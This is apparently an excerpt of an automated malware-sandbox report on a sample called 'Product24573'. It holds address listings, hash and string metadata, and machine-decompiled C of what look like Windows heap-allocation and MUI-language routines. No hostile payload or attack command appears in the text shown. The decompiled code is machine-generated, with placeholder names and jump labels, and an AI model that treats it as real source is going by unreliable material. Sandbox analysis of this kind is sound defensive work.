                                          0x0111a655
                                          0x01161eca
                                          0x01161ed1
                                          0x00000000
                                          0x00000000
                                          0x01161ed7
                                          0x00000000
                                          0x0111a65b
                                          0x0111a669
                                          0x0111a66e
                                          0x0111a670
                                          0x00000000
                                          0x00000000
                                          0x0111a676
                                          0x0111a67b
                                          0x0111a680
                                          0x0111a682
                                          0x01161f1a
                                          0x0111a688
                                          0x0111a688
                                          0x0111a688
                                          0x0111a68a
                                          0x0111a68d
                                          0x01161f24
                                          0x01161f2a
                                          0x01161f31
                                          0x01161f43
                                          0x01161f43
                                          0x01161f31
                                          0x0111a693
                                          0x0111a697
                                          0x0111a69d
                                          0x0111a6a0
                                          0x0111a6a6
                                          0x0111a6a8
                                          0x0111a6a8
                                          0x0111a6a8
                                          0x0111a6a8
                                          0x0111a6b2
                                          0x0111a6b7
                                          0x0111a6c1
                                          0x0111a6c6
                                          0x0111a6d2
                                          0x0111a6d9
                                          0x0111a6e3
                                          0x0111a6e6
                                          0x0111a6eb
                                          0x0111a6ed
                                          0x0111a6ed
                                          0x0111a6ed
                                          0x0111a6ed
                                          0x0111a6f3
                                          0x0111a6f8
                                          0x0111a702
                                          0x0111a70a
                                          0x0111a70e
                                          0x0111a71a
                                          0x0111a71e
                                          0x01161fcb
                                          0x01161fcf
                                          0x01161fdd
                                          0x01161fe3
                                          0x01161fe3
                                          0x0111a724
                                          0x0111a728
                                          0x0111a72a
                                          0x0111a72d
                                          0x0111a737
                                          0x0111a73a
                                          0x0111a73c
                                          0x0111a742
                                          0x0111a748
                                          0x01161f4d
                                          0x01161f50
                                          0x01161f56
                                          0x01161f5c
                                          0x01161f5f
                                          0x01161f7e
                                          0x01161f83
                                          0x01161f61
                                          0x01161f76
                                          0x01161f7b
                                          0x01161f89
                                          0x01161f8e
                                          0x01161f93
                                          0x01161f94
                                          0x01161f9a
                                          0x01161f9c
                                          0x01161f9e
                                          0x01161fa1
                                          0x01161fa1
                                          0x01161fa6
                                          0x01161fa6
                                          0x01161f50
                                          0x0111a74e
                                          0x0111a751
                                          0x0111a754
                                          0x0111a75d
                                          0x0111a75e
                                          0x0111a762
                                          0x0111a767
                                          0x01161faf
                                          0x01161fb0
                                          0x01161fb9
                                          0x01161fbe
                                          0x01161fc2
                                          0x01161fc2
                                          0x0111a76d
                                          0x0111a76d
                                          0x0111a775
                                          0x0111a778
                                          0x0111a77d
                                          0x0111a77d
                                          0x0111a71e
                                          0x0111a782
                                          0x0111a787
                                          0x0111a789
                                          0x01161ff3
                                          0x0111a78f
                                          0x0111a78f
                                          0x0111a78f
                                          0x0111a791
                                          0x0111a794
                                          0x01161ffd
                                          0x01162006
                                          0x0116200c
                                          0x01162017
                                          0x01162019
                                          0x01162024
                                          0x01162024
                                          0x01162024
                                          0x01162047
                                          0x01162047
                                          0x0116200c
                                          0x0111a79a
                                          0x0111a79f
                                          0x0111a7a4
                                          0x0111a7a9
                                          0x0111a7ab
                                          0x0116205a
                                          0x0111a7b1
                                          0x0111a7b1
                                          0x0111a7b1
                                          0x0111a7b3
                                          0x0111a7b6
                                          0x00000000
                                          0x0111a7bc
                                          0x01162066
                                          0x01162068
                                          0x01162073
                                          0x01162073
                                          0x01162073
                                          0x01162078
                                          0x01162079
                                          0x0116207d
                                          0x00000000
                                          0x0116207d
                                          0x0111a7b6
                                          0x0111a440
                                          0x0111a440
                                          0x0111a440
                                          0x0111a446
                                          0x0111a44c
                                          0x0111a44f
                                          0x0111a453
                                          0x0111a455
                                          0x011620b3
                                          0x011620b9
                                          0x011620b9
                                          0x0111a45d
                                          0x0111a460
                                          0x0111a464
                                          0x0111a466
                                          0x0111a46b
                                          0x0111a46f
                                          0x0111a471
                                          0x0111a471
                                          0x0111a471
                                          0x0111a474
                                          0x0111a479
                                          0x0111a47d
                                          0x0111a47f
                                          0x01162229
                                          0x0116222f
                                          0x0111a3c8
                                          0x0111a3c8
                                          0x0111a3ca
                                          0x0111a3ca
                                          0x00000000
                                          0x0111a3ca
                                          0x01162235
                                          0x0116223a
                                          0x0116223a
                                          0x00000000
                                          0x00000000
                                          0x01162240
                                          0x01162246
                                          0x0116224a
                                          0x01162269
                                          0x0116226e
                                          0x0116224c
                                          0x01162261
                                          0x01162266
                                          0x01162274
                                          0x01162279
                                          0x0116227e
                                          0x01162286
                                          0x01162288
                                          0x0116228d
                                          0x0116228d
                                          0x01162292
                                          0x01162292
                                          0x01162295
                                          0x01162295
                                          0x00000000
                                          0x01162295
                                          0x0111a485
                                          0x0111a489
                                          0x0111a48b
                                          0x0111a48f
                                          0x0111a493
                                          0x0111a497
                                          0x0111a49b
                                          0x0111a4bb
                                          0x0111a4bb
                                          0x0111a4bd
                                          0x0111a4ff
                                          0x0111a4ff
                                          0x0111a501
                                          0x0111a505
                                          0x0111a50f
                                          0x0111a517
                                          0x0111a51b
                                          0x0111a527
                                          0x0111a52b
                                          0x01162182
                                          0x01162185
                                          0x01162193
                                          0x01162199
                                          0x01162199
                                          0x0111a531
                                          0x0111a535
                                          0x0111a538
                                          0x0111a548
                                          0x0111a54b
                                          0x0111a54d
                                          0x0111a553
                                          0x0111a559
                                          0x01162100
                                          0x01162103
                                          0x01162109
                                          0x0116210f
                                          0x01162112
                                          0x01162131
                                          0x01162136
                                          0x01162114
                                          0x01162129
                                          0x0116212e
                                          0x0116213c
                                          0x01162141
                                          0x01162147
                                          0x0116214d
                                          0x01162151
                                          0x01162154
                                          0x01162154
                                          0x01162159
                                          0x01162159
                                          0x01162103
                                          0x0111a55f
                                          0x0111a562
                                          0x0111a565
                                          0x0111a567
                                          0x01162162
                                          0x0111a56d
                                          0x0111a574
                                          0x0111a575
                                          0x0111a579
                                          0x0111a57e
                                          0x01162169
                                          0x0116216a
                                          0x01162170
                                          0x01162175
                                          0x01162179
                                          0x01162179
                                          0x0111a57e
                                          0x0111a584
                                          0x0111a58f
                                          0x0111a58f
                                          0x0111a52b
                                          0x0111a5ad
                                          0x0111a5bc
                                          0x0111a5c1
                                          0x0111a5c6
                                          0x0111a5cb
                                          0x0111a5cd
                                          0x011621a9
                                          0x0111a5d3
                                          0x0111a5d3
                                          0x0111a5d3
                                          0x0111a5d5
                                          0x0111a5d8
                                          0x011621b3
                                          0x011621bc
                                          0x011621c2
                                          0x011621cd
                                          0x011621cf
                                          0x011621da
                                          0x011621da
                                          0x011621da
                                          0x011621f7
                                          0x011621f7
                                          0x011621c2
                                          0x0111a5de
                                          0x0111a5e3
                                          0x0111a5e8
                                          0x0111a5ea
                                          0x0116220a
                                          0x0111a5f0
                                          0x0111a5f0
                                          0x0111a5f0
                                          0x0111a5f2
                                          0x0111a5f5
                                          0x01162219
                                          0x0116221b
                                          0x0116208c
                                          0x0116208c
                                          0x0116208c
                                          0x01162095
                                          0x01162096
                                          0x01162097
                                          0x01162098
                                          0x011620a4
                                          0x011620a5
                                          0x011620a9
                                          0x011620a9
                                          0x00000000
                                          0x0111a5f5
                                          0x0111a4bf
                                          0x0111a4d3
                                          0x0111a4d8
                                          0x0111a4da
                                          0x01161ede
                                          0x01161ede
                                          0x01161ee4
                                          0x01161ee9
                                          0x00000000
                                          0x00000000
                                          0x01161f07
                                          0x00000000
                                          0x01161f07
                                          0x0111a4e0
                                          0x0111a4e5
                                          0x0111a4e7
                                          0x011620cb
                                          0x0111a4ed
                                          0x0111a4ed
                                          0x0111a4ed
                                          0x0111a4f2
                                          0x0111a4f5
                                          0x011620d5
                                          0x011620de
                                          0x011620e4
                                          0x011620f6
                                          0x011620f6
                                          0x011620e4
                                          0x0111a4fb
                                          0x00000000
                                          0x0111a4fb
                                          0x0111a4a1
                                          0x0111a4a4
                                          0x0111a4a8
                                          0x00000000
                                          0x00000000
                                          0x0111a4aa
                                          0x0111a4ac
                                          0x00000000
                                          0x00000000
                                          0x0111a4b2
                                          0x0111a4b5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0111a4b5
                                          0x0111a43a
                                          0x0111a340
                                          0x0111a346
                                          0x0111a600
                                          0x00000000
                                          0x0111a600
                                          0x0111a34f
                                          0x0111a351
                                          0x0111a358
                                          0x0111a3c6
                                          0x00000000
                                          0x0111a371
                                          0x0111a37a
                                          0x0111a37f
                                          0x0111a382
                                          0x0111a384
                                          0x0111a394
                                          0x00000000
                                          0x0111a396
                                          0x0111a399
                                          0x0111a3a7
                                          0x0111a3b0
                                          0x0111a3b4
                                          0x0111a3bb
                                          0x0111a3d2
                                          0x0111a3da
                                          0x0111a3df
                                          0x0111a3e1
                                          0x0111a3e5
                                          0x0111a3ea
                                          0x0111a3f0
                                          0x0111a3f0
                                          0x0111a3e1
                                          0x00000000
                                          0x0111a3bb
                                          0x0111a394

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 3f1c8a672e7399cf6c1da428a3693d0baebc562964ce7ce81cb0a728bd9bf350
                                          • Instruction ID: 80087e5ca9c64a693f39e1c96d2847aa7e00198c6ed21b069d256411f66a4212
                                          • Opcode Fuzzy Hash: 3f1c8a672e7399cf6c1da428a3693d0baebc562964ce7ce81cb0a728bd9bf350
                                          • Instruction Fuzzy Hash: F8421E316097829FC71DCF28D884B6AFBE9FF88204F08496DE5868B356D735D981CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011B2D82 Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E011B2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x11d0e80);
				E0114D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E010F40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E011B30C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E010FB150();
						} else {
							E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E010FB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E0110EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E011B4496(_t181, 0);
						_t177 = L01114620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E011B49A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E011AFA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E010F1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E011216C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E011B4496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x11e6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x11e6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x11e6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E010FB150();
								} else {
									E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0119D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E010FB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E010FB150();
								} else {
									E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E010FB150("Just allocated block at %p for %Ix bytes\n",  *0x11e6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x11e6378 = 1;
									 *0x11e60c0 = 0;
									asm("int3");
									 *0x11e6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x11e5708; // 0x0
					 *0x11eb1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0114D130(0, _t177, _t181);
				}
			}





















                                          0x011b2d82
                                          0x011b2d84
                                          0x011b2d89
                                          0x011b2d8e
                                          0x011b2d90
                                          0x011b2d92
                                          0x011b2d97
                                          0x011b2d9a
                                          0x011b2da4
                                          0x011b2dc0
                                          0x011b2dc3
                                          0x011b2dd1
                                          0x011b2dd6
                                          0x011b2dd8
                                          0x011b30a7
                                          0x011b30a7
                                          0x011b30aa
                                          0x011b30aa
                                          0x011b30ad
                                          0x011b30b4
                                          0x00000000
                                          0x011b30b9
                                          0x011b2de3
                                          0x011b2de8
                                          0x011b2deb
                                          0x011b2dee
                                          0x011b2df1
                                          0x011b2df3
                                          0x011b2dfb
                                          0x011b2dfb
                                          0x011b2df5
                                          0x011b2df5
                                          0x011b2df5
                                          0x011b2e04
                                          0x011b2e0a
                                          0x011b2e0d
                                          0x011b2e11
                                          0x011b2e11
                                          0x011b2e12
                                          0x011b2e15
                                          0x011b2e18
                                          0x011b2e1a
                                          0x011b3027
                                          0x011b3027
                                          0x011b302d
                                          0x011b3030
                                          0x011b304f
                                          0x011b3054
                                          0x011b3032
                                          0x011b3047
                                          0x011b304c
                                          0x011b305a
                                          0x011b3063
                                          0x00000000
                                          0x011b2e20
                                          0x011b2e20
                                          0x011b2e23
                                          0x00000000
                                          0x00000000
                                          0x011b2e29
                                          0x011b2e2b
                                          0x011b2e47
                                          0x011b2e2d
                                          0x011b2e33
                                          0x011b2e38
                                          0x011b2e3f
                                          0x011b2e42
                                          0x011b2e42
                                          0x011b2e4e
                                          0x011b2e5d
                                          0x011b2e5f
                                          0x011b2e62
                                          0x011b2e66
                                          0x011b2e6b
                                          0x011b2e6d
                                          0x00000000
                                          0x011b2e73
                                          0x011b2e73
                                          0x011b2e76
                                          0x011b2e7a
                                          0x011b2e83
                                          0x011b2e83
                                          0x011b2e83
                                          0x011b2e85
                                          0x011b2e87
                                          0x011b2e8a
                                          0x011b2e8d
                                          0x011b2e92
                                          0x011b2e9c
                                          0x011b2e9f
                                          0x011b2ea1
                                          0x011b2ea2
                                          0x011b2ea6
                                          0x011b2ea6
                                          0x011b2e9f
                                          0x011b2eab
                                          0x011b2eaf
                                          0x011b2edf
                                          0x011b2ee2
                                          0x011b2ee5
                                          0x011b2eb1
                                          0x011b2eb3
                                          0x011b2eb8
                                          0x011b2ebd
                                          0x011b2ec4
                                          0x011b2ed6
                                          0x011b2ec6
                                          0x011b2ec7
                                          0x011b2ecc
                                          0x011b2ecf
                                          0x011b2ed2
                                          0x011b2ed2
                                          0x011b2ed9
                                          0x011b2ed9
                                          0x011b2ee8
                                          0x011b2eeb
                                          0x011b2eef
                                          0x011b2ef2
                                          0x011b2efe
                                          0x011b2f04
                                          0x011b2f04
                                          0x011b2f04
                                          0x011b2f06
                                          0x011b2f0d
                                          0x011b2f0f
                                          0x011b2f13
                                          0x011b2f13
                                          0x011b2f1b
                                          0x011b2f21
                                          0x011b2f27
                                          0x011b2f95
                                          0x011b2f98
                                          0x011b2f9b
                                          0x011b2fa0
                                          0x00000000
                                          0x00000000
                                          0x011b2fa6
                                          0x011b2fa9
                                          0x011b2fac
                                          0x00000000
                                          0x00000000
                                          0x011b2fb2
                                          0x011b2fb9
                                          0x00000000
                                          0x00000000
                                          0x011b2fc3
                                          0x011b2fca
                                          0x00000000
                                          0x00000000
                                          0x011b2fd0
                                          0x011b2fd6
                                          0x011b2fd9
                                          0x011b2ff8
                                          0x011b2ffd
                                          0x011b2fdb
                                          0x011b2ff0
                                          0x011b2ff5
                                          0x011b300e
                                          0x011b300f
                                          0x011b301a
                                          0x00000000
                                          0x011b2f29
                                          0x011b2f29
                                          0x011b2f2c
                                          0x011b2f4b
                                          0x011b2f50
                                          0x011b2f2e
                                          0x011b2f43
                                          0x011b2f48
                                          0x011b2f56
                                          0x011b2f64
                                          0x011b2f6c
                                          0x011b2f6c
                                          0x011b2f72
                                          0x011b2f76
                                          0x011b2f7c
                                          0x011b2f83
                                          0x011b2f89
                                          0x011b2f8a
                                          0x011b2f8a
                                          0x00000000
                                          0x011b2f76
                                          0x011b2f27
                                          0x011b2e6d
                                          0x011b2da6
                                          0x011b2dab
                                          0x011b2db3
                                          0x011b2db9
                                          0x011b30bc
                                          0x011b30c1
                                          0x011b30c1

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 0-1745908468
                                          • Opcode ID: bf2fa1c6bce18a6b92eb37952b3cf76c686a255659047315de18edb4a87570f9
                                          • Instruction ID: 53e4ef25eae63dc28185efc31298258b3551f788807e8bf6f6aa04e8fd5c7740
                                          • Opcode Fuzzy Hash: bf2fa1c6bce18a6b92eb37952b3cf76c686a255659047315de18edb4a87570f9
                                          • Instruction Fuzzy Hash: 36914431A10641DFDB2EDFA9C484AEDBBF2FF99710F18801CE5965B651C732A886CB01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01103D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E01103D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01101B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01101B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01101B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01101B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01101B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01114620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0113F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01141370(_t276, 0x10d4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0113BB40(0,  &_v68, _t170);
									if(L011043C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0113BB40(_t257,  &_v68, _t243);
								if(L011043C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01141370(_t278, 0x10d4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01114620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0113F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01141370(_v16, 0x10d4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0113BB40(_t262,  &_v68, _t244);
								if(L011043C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01141370(_t282, 0x10d4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0113BB40(_t262,  &_v68, _t201);
							if(L011043C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01114620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0113F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01141370(_t280, 0x10d4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0113BB40(_t267,  &_v68, _t245);
							if(L011043C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01141370(_t284, 0x10d4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0113BB40(_t267,  &_v68, _t224);
						if(L011043C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































